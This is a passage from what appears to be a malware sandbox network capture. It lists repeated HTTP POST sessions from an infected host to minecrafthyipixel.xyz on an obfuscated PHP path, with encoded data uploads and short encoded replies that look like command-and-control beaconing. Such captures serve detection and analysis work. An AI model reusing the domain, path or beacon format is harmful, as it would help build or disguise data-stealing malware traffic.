                                                                                                                                     Apr 19, 2024 13:44:01.993902922 CEST | 2512 | OUT | Data Raw: 57 5d 5b 58 59 4a 51 5f 5c 5e 59 59 57 5f 58 5c 54 51 5f 59 54 54 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W][XYJQ_\^YYW_X\TQ_YTTSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%1&"( 30?^%+5*+4%*<$8>W!!1*^"<;9$[. X
                                                                                                                                     Apr 19, 2024 13:44:02.251390934 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oA4hHG7tY1hCTIavb3dpzd2ZFjlac9PUVBJx6vUwJsK5UnnoLMpSi%2FaS%2BRgnIeIRGEvcUEJNOmZu5WFjnnNi3bdr3qo8PGzTBa3b%2FHUoZ63%2BjqiefZ8SWpRClQ9oTRcUYS0tvrXjXvw%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3ec2f40ade4-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:44:02.251449108 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                     137 | 192.168.2.4 | 49890 | 104.21.57.61 | 80
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:44:02.489798069 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:44:02.594557047 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:44:02.594822884 CEST | 2512 | OUT | Data Raw: 57 59 5e 58 59 43 51 59 5c 5e 59 59 57 5e 58 59 54 54 5f 56 54 54 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^XYCQY\^YYW^XYTT_VTTSX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%\%=2V!'$ 0+"=^#&3$+= W)8'^ Z?:$[. X
                                                                                                                                     Apr 19, 2024 13:44:02.860089064 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:02 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wgfSQd432M6OAC4I6qbRtJiBCQaOQt9iCg3qQjFJXjVY6iVH9dA5a6uXie95P26VINmAx3HHsf4OVrE2BMkkC97MCsY6Ye%2BcVLBkiViCnMAWL%2B5zS1KUmrW1lfBQc3Z%2F2CTs%2FTuHxmc%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3efecb044cf-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:44:02.860196114 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                     138 | 192.168.2.4 | 49891 | 104.21.57.61 | 80
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:44:03.093296051 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                     Apr 19, 2024 13:44:03.197830915 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                     Apr 19, 2024 13:44:03.197990894 CEST | 2512 | OUT | Data Raw: 57 54 5e 5f 59 4b 51 5a 5c 5e 59 59 57 5f 58 59 54 54 5f 5e 54 5c 53 5b 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^_YKQZ\^YYW_XYTT_^T\S[^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2."]''3_';%?8#_&902.#"*]?]#.5$[. X
                                                                                                                                     Apr 19, 2024 13:44:03.460937977 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:03 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2gNUuGQ1BoebQdj8rCr7VarOZLorAmYdxFjK53t1m4jU2Uu3jExfMe%2FeENIj2nMjbw6N%2BDQUZRrUanPgvfmZ%2F5kbRTbDm4T5Zr8vVqztiTztIuTxRNAqXxRhr4GgHB6LLxDAUyW5%2FpY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3f3aa5ab0dc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                     Apr 19, 2024 13:44:03.461000919 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                     Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                     139 | 192.168.2.4 | 49892 | 104.21.57.61 | 80
                                                                                                                                     Timestamp | Bytes transferred | Direction | Data
                                                                                                                                     Apr 19, 2024 13:44:03.687530041 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:03.793061972 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:03.793222904 CEST | 2512 | OUT | Data Raw: 57 54 5e 59 59 4b 51 5a 5c 5e 59 59 57 5f 58 5b 54 56 5f 5d 54 5b 53 58 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^YYKQZ\^YYW_X[TV_]T[SX^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&2>5! Y$?$;%T*++Y1W%+R411=?_ 3:$[. X
                                                                                                                                    Apr 19, 2024 13:44:04.044292927 CEST | 627 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:03 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=YKVOfCrpboNGa4NkSkf4jJp9xl%2BRiE9oABkEk2yAeWQD%2BIEjxllfHqXfhtyLG5fkdOM2CUMRIe46y4RSuBrO%2BRZ0AutJtB9RGt%2BB4O5SBE5cTSz40WNFEJ0Rs%2FFgtK1fSN%2F%2BwdUha20%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3f76a92b0a5-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:04.044357061 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    140 | 192.168.2.4 | 49893 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:04.283432961 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:04.388004065 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:04.388139009 CEST | 2512 | OUT | Data Raw: 57 59 5e 55 5c 43 54 5f 5c 5e 59 59 57 5f 58 53 54 57 5f 5e 54 5b 53 5c 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WY^U\CT_\^YYW_XSTW_^T[S\^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]&'>R"+7$+%+.>;&?&+>P#15)4"<Z/5$[. X
                                                                                                                                    Apr 19, 2024 13:44:04.770385981 CEST | 625 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:04 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cKLqXJw%2Bnr83xNoJn17NmLq2EOixrjs4%2FYix%2BoXhSTgpn5Y7z6rJtTe%2BGkMPghW6jSLLb%2Frl0iWVWRVKd5k16h20Bac0aHeiPr8f2svR41fGXezq9kBHbUqmpJEnUD3%2B8zOKJVCh1Cg%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3fb1e8253f1-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:04.770447016 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    141 | 192.168.2.4 | 49894 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:04.996984959 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:05.103666067 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:05.103812933 CEST | 2512 | OUT | Data Raw: 57 5a 5e 5d 59 45 54 58 5c 5e 59 59 57 5f 58 5e 54 57 5f 5f 54 5e 53 56 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WZ^]YETX\^YYW_X^TW__T^SV^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%%-> +(]$+['6=('9 R&P4++48^95$[. X
                                                                                                                                    Apr 19, 2024 13:44:05.361855030 CEST | 629 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=4wTkTJdQGfPSYiwcD3YcIuHDn1%2F%2FALSWDBi3hIYsxbgLg6cbPBiE0G%2BSL%2Bew0Dhxlxh14ze%2FLVsnXxcs8bN2S8hJvHW%2BOIs%2BBha%2FMKzON7NaR77JKBe8bEVbPp80fiiHLpiXpTzCAW8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca3ff9a4553cc-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:05.361917973 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    142 | 192.168.2.4 | 49895 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:05.590873003 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:05.695827961 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:05.695970058 CEST | 2512 | OUT | Data Raw: 57 5f 5b 5b 59 47 51 58 5c 5e 59 59 57 51 58 5b 54 5b 5f 5b 54 5d 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W_[[YGQX\^YYWQX[T[_[T]S_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&>%6<003')>3\%)&% "1)+<#<#:%$[. X =
                                                                                                                                    Apr 19, 2024 13:44:05.976459026 CEST | 617 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:05 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5aec18Ix6HkzdGdKh6XVN%2BAB4MKEj6EkgrdzKXxfZndWccrDToRjO5RLZqn2DEES8VfWGZ6IEMuiYhZUlSjdyVvpiqZ0XIgZrJcfHst7Mv0xi7WIV%2F1npjJLKqnTlYlkRXf6GDZb7l8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4034b28b0d6-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:05.976521015 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    143 | 192.168.2.4 | 49897 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:06.302380085 CEST | 386 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2180
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Connection: Keep-Alive
                                                                                                                                    Apr 19, 2024 13:44:06.407438040 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:06.407572031 CEST | 2180 | OUT | Data Raw: 57 5c 5b 59 59 45 54 59 5c 5e 59 59 57 57 58 5e 54 56 5f 5d 54 5d 53 5a 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: W\[YYETY\^YYWWX^TV_]T]SZ^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%&!58(' 31T*+&2% 2=]'^4<3/%$[. X 1
                                                                                                                                    Apr 19, 2024 13:44:06.683408976 CEST | 768 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2Bd5p%2F7ki7a3ls82Zm6jVP5s4hWV97mOk6uXfkhB4ECcgBCa8uiLpQIvKI1Eholh6EcLIpbE5wUXxh3UxrksEXHN4HzkZsCgIpqZXK4bXS97rPtRfXN%2Bf9uEkPQiP9fSPwi6OdQE2NQY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca407bbf9ad5c-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 39 38 0d 0a 01 15 27 01 24 35 3e 58 36 39 23 5d 29 20 26 59 29 37 29 5f 3d 07 21 5a 23 2e 37 0b 38 2a 2b 05 3c 5d 3a 17 26 55 35 56 33 2d 34 56 26 0a 21 59 00 1a 3a 01 34 3f 29 5c 2d 3a 25 1c 28 08 3d 5b 20 22 38 04 28 2e 31 18 20 06 27 5b 3c 2e 35 56 2f 01 3c 53 3f 5e 29 5a 3b 37 08 15 21 11 2c 52 09 12 25 51 28 5e 34 5e 32 20 22 0d 23 0f 3f 03 3f 11 22 59 33 3b 3c 51 24 33 06 16 39 22 3e 54 26 3e 29 1e 29 04 3c 1f 20 12 22 08 32 04 2e 5e 2c 0c 2b 48 05 30 54 57 0d 0a
                                                                                                                                    Data Ascii: 98'$5>X69#]) &Y)7)_=!Z#.78*+<]:&U5V3-4V&!Y:4?)\-:%(=[ "8(.1 '[<.5V/<S?^)Z;7!,R%Q(^4^2 "#??"Y3;<Q$39">T&>))< "2.^,+H0TW
                                                                                                                                    Apr 19, 2024 13:44:06.683470011 CEST | 5 | IN | Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port
                                                                                                                                    144 | 192.168.2.4 | 49898 | 104.21.57.61 | 80
                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                    Apr 19, 2024 13:44:06.530709982 CEST | 362 | OUT | POST /voiddbProviderserver6/Auth/Uploads/CentralCentralLine/7Eternal/2_/Temp/ToUpdategameFlowerTemporary.php HTTP/1.1
                                                                                                                                    Content-Type: application/octet-stream
                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                                                                    Host: minecrafthyipixel.xyz
                                                                                                                                    Content-Length: 2512
                                                                                                                                    Expect: 100-continue
                                                                                                                                    Apr 19, 2024 13:44:06.635093927 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                                                                                                    Apr 19, 2024 13:44:06.635377884 CEST | 2512 | OUT | Data Raw: 57 54 5e 55 59 40 54 5b 5c 5e 59 59 57 55 58 5a 54 51 5f 59 54 58 53 5f 5e 5c 42 5e 51 5b 5e 5c 42 5a 55 5c 5d 56 57 5a 5f 58 52 57 5b 56 5e 5c 56 56 43 55 5e 5d 52 59 55 5c 5b 52 53 54 5b 5d 5d 53 59 5f 56 5f 5e 52 58 5d 59 58 41 5f 5a 53 54 5d
                                                                                                                                    Data Ascii: WT^UY@T[\^YYWUXZTQ_YTXS_^\B^Q[^\BZU\]VWZ_XRW[V^\VVCU^]RYU\[RST[]]SY_V_^RX]YXA_ZST]_PUY_\QTPX\ZSQ_Z_WV[^_[S_S[T^XURP]YY_S]U^\P^]Q^Y_PT^ZV^]ZWX[Q\VURBU^WZZ]ZQ^^RYZZ_QWZWX_XU^^]XP_YXV]^P]%^2*!' 0$(1P*+?^&V2.#26)]7#<^.$[. X -
                                                                                                                                    Apr 19, 2024 13:44:06.908200979 CEST | 621 | IN | HTTP/1.1 200 OK
                                                                                                                                    Date: Fri, 19 Apr 2024 11:44:06 GMT
                                                                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                    Connection: keep-alive
                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=P1fgr2fNrJ4Qnx86a1TQO%2Fc58wRQGk4%2Bi2qovOTBwEtKXaQzevVt4XhnpKIZjhKyyaCxbL9mnok2S%2FlqVoH9hLu0LyeKZdtFQgleEJLUQoBTnVwaS8FygiyS5%2BjeHmHWGPdqTnwwlQs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 876ca4092dddb074-ATL
                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                    Data Raw: 34 0d 0a 33 5d 5d 50 0d 0a
                                                                                                                                    Data Ascii: 43]]P
                                                                                                                                    Apr 19, 2024 13:44:06.908283949 CEST  5  IN  Data Raw: 30 0d 0a 0d 0a
                                                                                                                                    Data Ascii: 0


                                                                                                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port
                                                                                                                                    145  192.168.2.4  49899  104.21.57.61  80
